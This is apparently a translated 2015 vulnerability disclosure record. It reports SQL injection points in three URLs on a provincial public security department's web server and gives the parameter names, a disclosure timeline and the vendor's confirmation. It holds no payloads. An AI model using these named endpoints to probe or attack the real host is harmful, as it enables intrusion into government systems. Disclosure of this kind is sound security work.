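2015-06-24: Details reported to the vendor; awaiting vendor handling
2015-06-25: Vendor confirmed; details disclosed to the vendor only
2015-07-05: Details disclosed to core white hats and experts in related fields
2015-07-15: Details disclosed to regular white hats
2015-07-25: Details disclosed to intern white hats
2015-08-09: Details disclosed to the public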
All I want to say is that, for a provincial public security department, the security is far too poor! Heh.
The URL http://121.42.24.155:8888/zww/crj/content.jsp?artid=103 is injectable; parameter: artid
http://121.42.24.155:8888/zww/crj/list.jsp?classid=001001 is injectable; parameter: classid
http://121.42.24.155:8888/zww/crj/search.jsp?keys=1234 is injectable; parameter: keys
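Strengthen security awareness
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-06-25 11:33
Thank you very much! The vulnerability you submitted has been verified and will be fixed as soon as possible.
None yet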